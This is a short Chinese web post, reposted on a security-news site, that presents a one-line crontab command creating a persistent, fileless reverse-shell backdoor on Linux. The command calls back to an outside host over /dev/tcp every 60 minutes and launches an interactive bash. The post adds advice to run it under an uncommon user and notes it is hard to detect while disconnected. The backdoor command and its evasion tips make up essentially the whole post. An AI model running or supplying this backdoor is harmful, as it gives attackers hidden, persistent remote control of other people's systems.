安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > 一条命令实现无文件兼容性强的反弹后门

一条命令实现无文件兼容性强的反弹后门

时间:2015-01-25来源:WOOYUN 作者:猪猪侠点击:
最好用一个不常见的用户执行,任务写入/var/spool/cron/$username (crontab -l;echo */60 * * * * exec 9 /dev/tcp/dns.wuyun.org/53;exec 09;exec 19 21;/bin/bash --noprofile -i)|crontab - 60分钟反连一次,在未连接状态启动反连任务的时候,进程和端口都无状态 -ba

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username 

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

//内容来自安云网


60分钟反连一次,在未连接状态启动反连任务的时候,进程和端口都无状态 

-bash: connect: Connection refused  //内容来自AnYun.ORG
-bash: /dev/tcp/dns.wuyun.org/53: Connection refused 
-bash: 9: Bad file descriptor 
-bash: 9: Bad file descriptor

也就是说,你安装后,如果不连接成功,是很难被发现的。
//内容来自安云网

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容